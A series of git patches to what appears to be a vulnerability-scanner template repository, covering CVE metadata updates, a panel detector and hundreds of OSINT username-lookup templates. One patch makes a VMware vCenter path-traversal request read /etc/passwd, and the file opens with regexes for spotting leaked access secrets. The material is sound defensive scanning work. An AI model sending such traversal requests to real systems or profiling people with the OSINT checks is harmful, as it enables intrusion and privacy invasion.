"(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 670062997f34709e89ee88cbc6b86fff4d654608 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 10:57:29 +0000 Subject: [PATCH 50/84] Auto Generated CVE annotations [Thu Mar 2 10:57:29 UTC 2023] :robot: --- cves/2018/CVE-2018-3714.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2022/CVE-2022-36537.yaml | 2 +- cves/2022/CVE-2022-39952.yaml | 5 +++++ cves/2022/CVE-2022-48165.yaml | 6 +++++- cves/2023/CVE-2023-23752.yaml | 6 +++++- 6 files changed, 18 insertions(+), 5 deletions(-) diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index 9e5d13f0bd..25600bc025 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -9,7 +9,7 @@ info: - https://hackerone.com/reports/309124 - https://nvd.nist.gov/vuln/detail/CVE-2018-3714 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2018-3714 cwe-id: CWE-22 diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index ae765894fb..e30369a2d0 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -11,7 +11,7 @@ info: - https://www.exploit-db.com/exploits/47230 - http://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-15107 cwe-id: CWE-78 diff --git a/cves/2022/CVE-2022-36537.yaml b/cves/2022/CVE-2022-36537.yaml index d175442b95..f7a8589037 100644 --- a/cves/2022/CVE-2022-36537.yaml +++ b/cves/2022/CVE-2022-36537.yaml @@ -18,7 +18,7 @@ info: metadata: shodan-query: http.title:"Server backup manager" verified: "true" - tags: cve,cve2022,zk-framework,exposure,unauth + tags: cve,cve2022,zk-framework,exposure,unauth,kev requests: - raw: diff --git a/cves/2022/CVE-2022-39952.yaml b/cves/2022/CVE-2022-39952.yaml index 9809af1bae..c1092011ac 100644 --- a/cves/2022/CVE-2022-39952.yaml +++ b/cves/2022/CVE-2022-39952.yaml @@ -11,6 +11,11 @@ info: - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ - https://github.com/horizon3ai/CVE-2022-39952 remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-39952 + cwe-id: CWE-610 metadata: shodan-query: title:"FortiNAC" verified: "true" diff --git a/cves/2022/CVE-2022-48165.yaml b/cves/2022/CVE-2022-48165.yaml index 446f23327c..7e84d497fb 100644 --- a/cves/2022/CVE-2022-48165.yaml +++ b/cves/2022/CVE-2022-48165.yaml @@ -11,9 +11,13 @@ info: - https://twitter.com/For3stCo1d/status/1622576544190464000 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165 - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-48165 metadata: - verified: "true" shodan-query: http.favicon.hash:-1350437236 + verified: "true" tags: cve,cve2022,wavlink,router,exposure requests: diff --git a/cves/2023/CVE-2023-23752.yaml b/cves/2023/CVE-2023-23752.yaml index b587622e09..9b2678d028 100644 --- a/cves/2023/CVE-2023-23752.yaml +++ b/cves/2023/CVE-2023-23752.yaml @@ -3,7 +3,7 @@ id: CVE-2023-23752 info: name: Joomla Improper AccessCheck in WebService Endpoint author: badboycxcc,Sascha Brendel - severity: high + severity: medium description: | An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. reference: @@ -12,6 +12,10 @@ info: - https://cve.report/CVE-2023-23752 - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html remediation: Upgrade to Joomla! version 4.2.8 or later. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 metadata: shodan-query: html:"Joomla! - Open Source Content Management" verified: "true" From d7c97bd60db89c54bb9b8ec7fce2eb487aeaec2c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 2 Mar 2023 17:28:14 +0530 Subject: [PATCH 52/84] updated matchers,info added - redirect,extractor --- ....yaml => axway-securetransport-panel.yaml} | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) rename exposed-panels/{axway-securetransport.yaml => axway-securetransport-panel.yaml} (51%) diff --git a/exposed-panels/axway-securetransport.yaml b/exposed-panels/axway-securetransport-panel.yaml similarity index 51% rename from exposed-panels/axway-securetransport.yaml rename to exposed-panels/axway-securetransport-panel.yaml index 05c90a9a88..e3ae8ee8e9 100644 --- a/exposed-panels/axway-securetransport.yaml +++ b/exposed-panels/axway-securetransport-panel.yaml @@ -1,32 +1,43 @@ -id: axway-securetransport +id: axway-securetransport-panel info: name: AXWAY Secure Transport Panel - Detect author: righettod severity: info description: | - AXWAY Secure Transport panel was detected. + AXWAY Secure Transport login panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport metadata: verified: "true" shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 - tags: panel,login,axway,securetransport + tags: panel,axway,securetransport requests: - method: GET path: - '{{BaseURL}}' + host-redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - - "SecureTransport" - - "Axway SecureTransport" - condition: and + - 'Axway SecureTransport' + - 'alt="Axway SecureTransport"' + - 'Welcome to SecureTransport' + - 'PrintServerInfo("SecureTransport' + condition: or - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"SecureTransport", "([0-9.]+)",' From 7d11a0e2af315d15737162ce82edd3ee2046e4e5 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 2 Mar 2023 13:05:19 +0000 Subject: [PATCH 53/84] Auto Generated New Template Addition List [Thu Mar 2 13:05:19 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 60b42f8422..958ae5d1c9 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2022/CVE-2022-48165.yaml +exposed-panels/axway-securetransport-panel.yaml exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From 367a2434b31514f2422e42d456e48650364d40cc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 3 Mar 2023 00:33:52 +0530 Subject: [PATCH 54/84] Fix FP --- vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index c696caa5bc..9f5a527891 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -14,10 +14,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/eam/vib?id=/etc/issue" + - "{{BaseURL}}/eam/vib?id=/etc/passwd" matchers: - - type: word - words: - - "vCenter Server" + - type: regex + regex: + - "root:.*:0:0:" # Enhanced by mp on 2022/08/01 From 8b43d840f844db694b57edda751e760d2c650a95 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 3 Mar 2023 00:36:32 +0530 Subject: [PATCH 55/84] misc --- vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index 9f5a527891..ffdac8c205 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -9,15 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: vmware,lfi,vcenter + tags: vmware,lfi,vcenter,linux requests: - method: GET path: - "{{BaseURL}}/eam/vib?id=/etc/passwd" + matchers: - type: regex regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/08/01 From 1a7a5994256c1df41ea217fa35487acecba9d9a0 Mon Sep 17 00:00:00 2001 From: sullo <sullo@cirt.net> Date: Thu, 2 Mar 2023 16:29:29 -0500 Subject: [PATCH 57/84] Add description and classification to all OSINT templates --- osint/1001mem.yaml | 5 +++++ osint/21buttons.yaml | 5 +++++ osint/247sports.yaml | 5 +++++ osint/3dnews.yaml | 5 +++++ osint/3dtoday.yaml | 5 +++++ osint/7cup.yaml | 5 +++++ osint/7dach.yaml | 5 +++++ osint/aaha-chat.yaml | 5 +++++ osint/aboutme.yaml | 5 +++++ osint/acf.yaml | 5 +++++ osint/admire-me.yaml | 5 +++++ osint/adult-forum.yaml | 5 +++++ osint/adultism.yaml | 5 +++++ osint/advfn.yaml | 5 +++++ osint/aflam.yaml | 5 +++++ osint/airline-pilot-life.yaml | 5 +++++ osint/airliners.yaml | 5 +++++ osint/akniga.yaml | 5 +++++ osint/albicla.yaml | 5 +++++ osint/alik.yaml | 5 +++++ osint/allesovercrypto.yaml | 5 +++++ osint/allmylinks.yaml | 5 +++++ osint/alloannonces.yaml | 5 +++++ osint/alltrails.yaml | 5 +++++ osint/ameblo.yaml | 5 +++++ osint/americanthinker.yaml | 5 +++++ osint/animeplanet.yaml | 5 +++++ osint/anobii.yaml | 5 +++++ osint/anonup.yaml | 5 +++++ osint/apex-legends.yaml | 5 +++++ osint/appian.yaml | 5 +++++ osint/apteka.yaml | 5 +++++ osint/archive-of-our-own-account.yaml | 5 +++++ osint/arduino.yaml | 5 +++++ osint/armorgames.yaml | 5 +++++ osint/artbreeder.yaml | 5 +++++ osint/artists-clients.yaml | 5 +++++ osint/artstation.yaml | 5 +++++ osint/asciinema.yaml | 5 +++++ osint/askfm.yaml | 5 +++++ osint/audiojungle.yaml | 5 +++++ osint/auru.yaml | 5 +++++ osint/authorstream.yaml | 5 +++++ osint/avid-community.yaml | 5 +++++ osint/babepedia.yaml | 5 +++++ osint/babypips.yaml | 5 +++++ osint/bandcamp.yaml | 5 +++++ osint/bandlab.yaml | 5 +++++ osint/bblog-ru.yaml | 5 +++++ osint/bdsmlr.yaml | 5 +++++ osint/bdsmsingles.yaml | 5 +++++ osint/behance.yaml | 5 +++++ osint/bentbox.yaml | 5 +++++ osint/biggerpockets.yaml | 5 +++++ osint/bigo-live.yaml | 5 +++++ osint/bikemap.yaml | 5 +++++ osint/bimpos.yaml | 5 +++++ osint/biolink.yaml | 5 +++++ osint/bitbucket.yaml | 5 +++++ osint/bitchute.yaml | 5 +++++ osint/bitcoin-forum.yaml | 5 +++++ osint/bittube.yaml | 5 +++++ osint/blipfm.yaml | 5 +++++ osint/blogger.yaml | 5 +++++ osint/blogipl.yaml | 5 +++++ osint/blogmarks.yaml | 5 +++++ osint/blogspot.yaml | 5 +++++ osint/bodybuildingcom.yaml | 5 +++++ osint/bonga-cams.yaml | 5 +++++ osint/bookcrossing.yaml | 5 +++++ osint/boosty.yaml | 5 +++++ osint/booth.yaml | 5 +++++ osint/breach-forums.yaml | 5 +++++ osint/brickset.yaml | 5 +++++ osint/bugcrowd.yaml | 5 +++++ osint/bunpro.yaml | 5 +++++ osint/buymeacoffee.yaml | 5 +++++ osint/buzzfeed.yaml | 5 +++++ osint/buzznet.yaml | 5 +++++ osint/cafecito.yaml | 5 +++++ osint/calendy.yaml | 5 +++++ osint/cameo.yaml | 5 +++++ osint/carbonmade.yaml | 5 +++++ osint/careerhabr.yaml | 5 +++++ osint/caringbridge.yaml | 5 +++++ osint/carrdco.yaml | 5 +++++ osint/cashapp.yaml | 5 +++++ osint/castingcallclub.yaml | 5 +++++ osint/cd-action.yaml | 5 +++++ osint/cdapl.yaml | 5 +++++ osint/championat.yaml | 5 +++++ osint/chamsko.yaml | 5 +++++ osint/chaturbate.yaml | 5 +++++ osint/cheezburger.yaml | 5 +++++ osint/chesscom.yaml | 5 +++++ osint/chomikujpl.yaml | 5 +++++ osint/chyoa.yaml | 5 +++++ osint/climatejusticerocks-mastodon-instance.yaml | 5 +++++ osint/cloudflare.yaml | 5 +++++ osint/clubhouse.yaml | 5 +++++ osint/clusterdafrica.yaml | 5 +++++ osint/cnet.yaml | 5 +++++ osint/codeberg.yaml | 5 +++++ osint/codecademy.yaml | 5 +++++ osint/codeforces.yaml | 5 +++++ osint/codementor.yaml | 5 +++++ osint/coderwall.yaml | 5 +++++ osint/codewars.yaml | 5 +++++ osint/cohost.yaml | 5 +++++ osint/colourlovers.yaml | 5 +++++ osint/contactossex.yaml | 5 +++++ osint/coroflot.yaml | 5 +++++ osint/cowboys4angels.yaml | 5 +++++ osint/cracked-io.yaml | 5 +++++ osint/cracked.yaml | 5 +++++ osint/crevado.yaml | 5 +++++ osint/crowdin.yaml | 5 +++++ osint/cults3d.yaml | 5 +++++ osint/curiouscat.yaml | 5 +++++ osint/cytoid.yaml | 5 +++++ osint/dailymotion.yaml | 5 +++++ osint/darudar.yaml | 5 +++++ osint/dateinasia.yaml | 5 +++++ osint/datezone.yaml | 5 +++++ osint/datingru.yaml | 5 +++++ osint/demotywatory.yaml | 5 +++++ osint/depop.yaml | 5 +++++ osint/designspriation.yaml | 5 +++++ osint/destructoid.yaml | 5 +++++ osint/deviantart.yaml | 5 +++++ osint/devrant.yaml | 5 +++++ osint/devto.yaml | 5 +++++ osint/dfgames.yaml | 5 +++++ osint/diablo.yaml | 5 +++++ osint/dibiz.yaml | 5 +++++ osint/digitalspy.yaml | 5 +++++ osint/diigo.yaml | 5 +++++ osint/disabledrocks-mastodon-instance.yaml | 5 +++++ osint/discogs.yaml | 5 +++++ osint/discourse.yaml | 5 +++++ osint/discusselasticco.yaml | 5 +++++ osint/discusssocial-mastodon-instance.yaml | 5 +++++ osint/disqus.yaml | 5 +++++ osint/dissenter.yaml | 5 +++++ osint/dockerhub.yaml | 5 +++++ osint/dojoverse.yaml | 5 +++++ osint/donation-alerts.yaml | 5 +++++ osint/dotcards.yaml | 5 +++++ osint/dribbble.yaml | 5 +++++ osint/droners.yaml | 5 +++++ osint/drum.yaml | 5 +++++ osint/duolingo.yaml | 5 +++++ osint/easyen.yaml | 5 +++++ osint/ebay-stores.yaml | 5 +++++ osint/ebay.yaml | 5 +++++ osint/elloco.yaml | 5 +++++ osint/engadget.yaml | 5 +++++ osint/eporner.yaml | 5 +++++ osint/etoro.yaml | 5 +++++ osint/etsy.yaml | 5 +++++ osint/expressionalsocial-mastodon-instance.yaml | 5 +++++ osint/extralunchmoney.yaml | 5 +++++ osint/eyeem.yaml | 5 +++++ osint/f3.yaml | 5 +++++ osint/fabswingers.yaml | 5 +++++ osint/faktopedia.yaml | 5 +++++ osint/fancentro.yaml | 5 +++++ osint/fandalism.yaml | 5 +++++ osint/fandom.yaml | 5 +++++ osint/fanpop.yaml | 5 +++++ osint/fansly.yaml | 5 +++++ osint/fark.yaml | 5 +++++ osint/farkascity.yaml | 5 +++++ osint/fatsecret.yaml | 5 +++++ osint/fcv.yaml | 5 +++++ osint/federatedpress-mastodon-instance.yaml | 5 +++++ osint/figma.yaml | 5 +++++ osint/filmweb.yaml | 5 +++++ osint/fine-art-america.yaml | 5 +++++ osint/fiverr.yaml | 5 +++++ osint/flickr.yaml | 5 +++++ osint/flipboard.yaml | 5 +++++ osint/flowcode.yaml | 5 +++++ osint/fodors-forum.yaml | 5 +++++ osint/fortnite-tracker.yaml | 5 +++++ osint/forumprawneorg.yaml | 5 +++++ osint/fosstodonorg-mastodon-instance.yaml | 5 +++++ osint/fotka.yaml | 5 +++++ osint/foursquare.yaml | 5 +++++ osint/freelancer.yaml | 5 +++++ osint/freesound.yaml | 5 +++++ osint/friendfinder-x.yaml | 5 +++++ osint/friendfinder.yaml | 5 +++++ osint/friendweb.yaml | 5 +++++ osint/furaffinity.yaml | 5 +++++ osint/furiffic.yaml | 5 +++++ osint/gab.yaml | 5 +++++ osint/game-debate.yaml | 5 +++++ osint/gamespot.yaml | 5 +++++ osint/garmin-connect.yaml | 5 +++++ osint/geocaching.yaml | 5 +++++ osint/getmonero.yaml | 5 +++++ osint/gettr.yaml | 5 +++++ osint/gfycat.yaml | 5 +++++ osint/gigapan.yaml | 5 +++++ osint/giphy.yaml | 5 +++++ osint/girlfriendsmeet.yaml | 5 +++++ osint/gitea.yaml | 5 +++++ osint/gitee.yaml | 5 +++++ osint/giters.yaml | 5 +++++ osint/github.yaml | 5 +++++ osint/gitlab.yaml | 5 +++++ osint/gloriatv.yaml | 5 +++++ osint/gnome-extensions.yaml | 5 +++++ osint/gpoddernet.yaml | 5 +++++ osint/grandprof.yaml | 5 +++++ osint/graphicssocial-mastodon-instance.yaml | 5 +++++ osint/gravatar.yaml | 5 +++++ osint/gumroad.yaml | 5 +++++ osint/hackaday.yaml | 5 +++++ osint/hacker-news.yaml | 5 +++++ osint/hackerearth.yaml | 5 +++++ osint/hackernoon.yaml | 5 +++++ osint/hackerone.yaml | 5 +++++ osint/hackerrank.yaml | 5 +++++ osint/hackster.yaml | 5 +++++ osint/hamaha.yaml | 5 +++++ osint/hanime.yaml | 5 +++++ osint/hcommonssocial-mastodon-instance.yaml | 5 +++++ osint/heylink.yaml | 5 +++++ osint/hiberworld.yaml | 5 +++++ osint/hihello.yaml | 5 +++++ osint/historianssocial-mastodon-instance.yaml | 5 +++++ osint/homedesign3d.yaml | 5 +++++ osint/hometechsocial-mastodon-instance.yaml | 5 +++++ osint/hoobe.yaml | 5 +++++ osint/hostuxsocial-mastodon-instance.yaml | 5 +++++ osint/houzz.yaml | 5 +++++ osint/hubpages.yaml | 5 +++++ osint/hubski.yaml | 5 +++++ osint/hugging-face.yaml | 5 +++++ osint/iconfinder.yaml | 5 +++++ osint/icq-chat.yaml | 5 +++++ osint/ifttt.yaml | 5 +++++ osint/ifunny.yaml | 5 +++++ osint/igromania.yaml | 5 +++++ osint/ilovegrowingmarijuana.yaml | 5 +++++ osint/imagefap.yaml | 5 +++++ osint/imageshack.yaml | 5 +++++ osint/imgsrcru.yaml | 5 +++++ osint/imgur.yaml | 5 +++++ osint/inaturalist.yaml | 5 +++++ osint/independent-academia.yaml | 5 +++++ osint/inkbunny.yaml | 5 +++++ osint/insanejournal.yaml | 5 +++++ osint/instagram.yaml | 5 +++++ osint/instructables.yaml | 5 +++++ osint/internet-archive-account.yaml | 5 +++++ osint/internet-archive-user-search.yaml | 5 +++++ osint/interpals.yaml | 5 +++++ osint/ismygirl.yaml | 5 +++++ osint/issuu.yaml | 5 +++++ osint/itchio.yaml | 5 +++++ osint/japandict.yaml | 5 +++++ osint/jbzd.yaml | 5 +++++ osint/jejapl.yaml | 5 +++++ osint/jeuxvideo.yaml | 5 +++++ osint/joe-monster.yaml | 5 +++++ osint/jsfiddle.yaml | 5 +++++ osint/justforfans.yaml | 5 +++++ osint/kaggle.yaml | 5 +++++ osint/karabin.yaml | 5 +++++ osint/keybase.yaml | 5 +++++ osint/kickstarter.yaml | 5 +++++ osint/kik.yaml | 5 +++++ osint/kipin.yaml | 5 +++++ osint/knowyourmeme.yaml | 5 +++++ osint/ko-fi.yaml | 5 +++++ osint/kongregate.yaml | 5 +++++ osint/kotburger.yaml | 5 +++++ osint/kwejkpl.yaml | 5 +++++ osint/librarything.yaml | 5 +++++ osint/libretoothgr-mastodon-instance.yaml | 5 +++++ osint/lichess.yaml | 5 +++++ osint/likeevideo.yaml | 5 +++++ osint/line.yaml | 5 +++++ osint/linktree.yaml | 5 +++++ osint/linuxorgru.yaml | 5 +++++ osint/litmindclub-mastodon-instance.yaml | 5 +++++ osint/livejournal.yaml | 5 +++++ osint/livemasterru.yaml | 5 +++++ osint/lobsters.yaml | 5 +++++ osint/lorsh-mastodon-instance.yaml | 5 +++++ osint/love-ru.yaml | 5 +++++ osint/lowcygierpl.yaml | 5 +++++ osint/maga-chat.yaml | 5 +++++ osint/magabook.yaml | 5 +++++ osint/magix.yaml | 5 +++++ osint/manyvids.yaml | 5 +++++ osint/mapmytracks.yaml | 5 +++++ osint/mapstodonspace-mastodon-instance.yaml | 5 +++++ osint/maroc-nl.yaml | 5 +++++ osint/marshmallow.yaml | 5 +++++ osint/martech.yaml | 5 +++++ osint/massage-anywhere.yaml | 5 +++++ osint/mastoai.yaml | 5 +++++ osint/mastodon-101010pl.yaml | 5 +++++ osint/mastodon-api.yaml | 5 +++++ osint/mastodon-chaossocial.yaml | 5 +++++ osint/mastodon-climatejusticerocks.yaml | 5 +++++ osint/mastodon-countersocial.yaml | 5 +++++ osint/mastodon-defcon.yaml | 5 +++++ osint/mastodon-eu-voice.yaml | 5 +++++ osint/mastodon-mastodon.yaml | 5 +++++ osint/mastodon-meowsocial.yaml | 5 +++++ osint/mastodon-mstdnio.yaml | 5 +++++ osint/mastodon-polsocial.yaml | 5 +++++ osint/mastodon-rigczclub.yaml | 5 +++++ osint/mastodon-social-tchncs.yaml | 5 +++++ osint/mastodon-tflnetpl.yaml | 5 +++++ osint/mastodon-tootcommunity.yaml | 5 +++++ osint/mastodonbooksnet-mastodon-instance.yaml | 5 +++++ osint/mastodonchasedemdev-mastodon-instance.yaml | 5 +++++ osint/mastodononline.yaml | 5 +++++ osint/mastonyc-mastodon-instance.yaml | 5 +++++ osint/mastown-mastodon-instance.yaml | 5 +++++ osint/mcname-minecraft.yaml | 5 +++++ osint/mcuuid-minecraft.yaml | 5 +++++ osint/mediakits.yaml | 5 +++++ osint/medium.yaml | 5 +++++ osint/medyczkapl.yaml | 5 +++++ osint/meet-me.yaml | 5 +++++ osint/megamodelspl.yaml | 5 +++++ osint/memrise.yaml | 5 +++++ osint/message-me.yaml | 5 +++++ osint/metacritic.yaml | 5 +++++ osint/microsoft-technet-community.yaml | 5 +++++ osint/minds.yaml | 5 +++++ osint/minecraft-list.yaml | 5 +++++ osint/mintme.yaml | 5 +++++ osint/mistrzowie.yaml | 5 +++++ osint/mix.yaml | 5 +++++ osint/mixi.yaml | 5 +++++ osint/mixlr.yaml | 5 +++++ osint/mmorpg.yaml | 5 +++++ osint/mod-db.yaml | 5 +++++ osint/moneysavingexpert.yaml | 5 +++++ osint/motokiller.yaml | 5 +++++ osint/moxfield.yaml | 5 +++++ osint/muck-rack.yaml | 5 +++++ osint/musiciansocial-mastodon-instance.yaml | 5 +++++ osint/musictraveler.yaml | 5 +++++ osint/my-instants.yaml | 5 +++++ osint/myanimelist.yaml | 5 +++++ osint/mybuildercom.yaml | 5 +++++ osint/myfitnesspal-author.yaml | 5 +++++ osint/myfitnesspal-community.yaml | 5 +++++ osint/mylot.yaml | 5 +++++ osint/mymfans.yaml | 5 +++++ osint/myportfolio.yaml | 5 +++++ osint/myspace.yaml | 5 +++++ osint/myspreadshop.yaml | 5 +++++ osint/naija-planet.yaml | 5 +++++ osint/nairaland.yaml | 5 +++++ osint/naturalnews.yaml | 5 +++++ osint/naver.yaml | 5 +++++ osint/netvibes.yaml | 5 +++++ osint/newgrounds.yaml | 5 +++++ osint/newmeet.yaml | 5 +++++ osint/nihbuatjajan.yaml | 5 +++++ osint/nitecrew-mastodon-instance.yaml | 5 +++++ osint/nnru.yaml | 5 +++++ osint/notabug.yaml | 5 +++++ osint/note.yaml | 5 +++++ osint/oglaszamy24hpl.yaml | 5 +++++ osint/ogugg.yaml | 5 +++++ osint/okidoki.yaml | 5 +++++ osint/okru.yaml | 5 +++++ osint/olx.yaml | 5 +++++ osint/omlet.yaml | 5 +++++ osint/opencollective.yaml | 5 +++++ osint/opensource.yaml | 5 +++++ osint/openstreetmap.yaml | 5 +++++ osint/opgg.yaml | 5 +++++ osint/orbys.yaml | 5 +++++ osint/osu.yaml | 5 +++++ osint/our-freedom-book.yaml | 5 +++++ osint/owly.yaml | 5 +++++ osint/palnet.yaml | 5 +++++ osint/parler-archived-posts.yaml | 5 +++++ osint/parler-archived-profile.yaml | 5 +++++ osint/parler.yaml | 5 +++++ osint/pastebin.yaml | 5 +++++ osint/patch.yaml | 5 +++++ osint/patientslikeme.yaml | 5 +++++ osint/patreon.yaml | 5 +++++ osint/patriots-win.yaml | 5 +++++ osint/patronite.yaml | 5 +++++ osint/paypal.yaml | 5 +++++ osint/pcgamer.yaml | 5 +++++ osint/pcpartpicker.yaml | 5 +++++ osint/peing.yaml | 5 +++++ osint/periscope.yaml | 5 +++++ osint/pettingzooco-mastodon-instance.yaml | 5 +++++ osint/pewex.yaml | 5 +++++ osint/picsart.yaml | 5 +++++ osint/piekielni.yaml | 5 +++++ osint/pikabu.yaml | 5 +++++ osint/pillowfort.yaml | 5 +++++ osint/pinkbike.yaml | 5 +++++ osint/pinterest.yaml | 5 +++++ osint/pixelfedsocial.yaml | 5 +++++ osint/playstation-network.yaml | 5 +++++ osint/plurk.yaml | 5 +++++ osint/pokec.yaml | 5 +++++ osint/pokemonshowdown.yaml | 5 +++++ osint/pokerstrategy.yaml | 5 +++++ osint/polchatpl.yaml | 5 +++++ osint/policja2009.yaml | 5 +++++ osint/poll-everywhere.yaml | 5 +++++ osint/polygon.yaml | 5 +++++ osint/popl.yaml | 5 +++++ osint/pornhub-porn-stars.yaml | 5 +++++ osint/pornhub-users.yaml | 5 +++++ osint/poshmark.yaml | 5 +++++ osint/postcrossing.yaml | 5 +++++ osint/poweredbygaysocial-mastodon-instance.yaml | 5 +++++ osint/producthunt.yaml | 5 +++++ osint/promodj.yaml | 5 +++++ osint/pronounspage.yaml | 5 +++++ osint/pronouny.yaml | 5 +++++ osint/prose.yaml | 5 +++++ osint/prvpl.yaml | 5 +++++ osint/psstaudio.yaml | 5 +++++ osint/public.yaml | 5 +++++ osint/pypi.yaml | 5 +++++ osint/queer.yaml | 5 +++++ osint/quitterpl.yaml | 5 +++++ osint/quora.yaml | 5 +++++ osint/raddleme.yaml | 5 +++++ osint/rantli.yaml | 5 +++++ osint/reblogme.yaml | 5 +++++ osint/redbubble.yaml | 5 +++++ osint/reddit.yaml | 5 +++++ osint/redgifs.yaml | 5 +++++ osint/refsheet.yaml | 5 +++++ osint/researchgate.yaml | 5 +++++ osint/resumes-actorsaccess.yaml | 5 +++++ osint/revolut.yaml | 5 +++++ osint/riskru.yaml | 5 +++++ osint/roblox.yaml | 5 +++++ osint/rsi.yaml | 5 +++++ osint/ru-123rf.yaml | 5 +++++ osint/rumblechannel.yaml | 5 +++++ osint/rumbleuser.yaml | 5 +++++ osint/salon24.yaml | 5 +++++ osint/saracartershow.yaml | 5 +++++ osint/scoutwiki.yaml | 5 +++++ osint/scratch.yaml | 5 +++++ osint/secure-donation.yaml | 5 +++++ osint/seneporno.yaml | 5 +++++ osint/sentimente.yaml | 5 +++++ osint/seoclerks.yaml | 5 +++++ osint/setlistfm.yaml | 5 +++++ osint/sexworker.yaml | 5 +++++ osint/sfd.yaml | 5 +++++ osint/shanii-writes.yaml | 5 +++++ osint/shesfreaky.yaml | 5 +++++ osint/shopify.yaml | 5 +++++ osint/shutterstock.yaml | 5 +++++ osint/skeb.yaml | 5 +++++ osint/skyrock.yaml | 5 +++++ osint/slackholes.yaml | 5 +++++ osint/slant.yaml | 5 +++++ osint/slides.yaml | 5 +++++ osint/slideshare.yaml | 5 +++++ osint/smashrun.yaml | 5 +++++ osint/smelsy.yaml | 5 +++++ osint/smugmug.yaml | 5 +++++ osint/smule.yaml | 5 +++++ osint/snapchat-stories.yaml | 5 +++++ osint/snapchat.yaml | 5 +++++ osint/snipfeed.yaml | 5 +++++ osint/soccitizen4eu.yaml | 5 +++++ osint/social-msdn.yaml | 5 +++++ osint/socialbundde.yaml | 5 +++++ osint/sofurry.yaml | 5 +++++ osint/solikick.yaml | 5 +++++ osint/soloby.yaml | 5 +++++ osint/soloto.yaml | 5 +++++ osint/soundcloud.yaml | 5 +++++ osint/soup.yaml | 5 +++++ osint/sourceforge.yaml | 5 +++++ osint/speaker-deck.yaml | 5 +++++ osint/speedrun.yaml | 5 +++++ osint/spiceworks.yaml | 5 +++++ osint/sporcle.yaml | 5 +++++ osint/spotify.yaml | 5 +++++ osint/steam.yaml | 5 +++++ osint/steemit.yaml | 5 +++++ osint/steller.yaml | 5 +++++ osint/stonerssocial-mastodon-instance.yaml | 5 +++++ osint/storycorps.yaml | 5 +++++ osint/streamelements.yaml | 5 +++++ osint/streamlabs.yaml | 5 +++++ 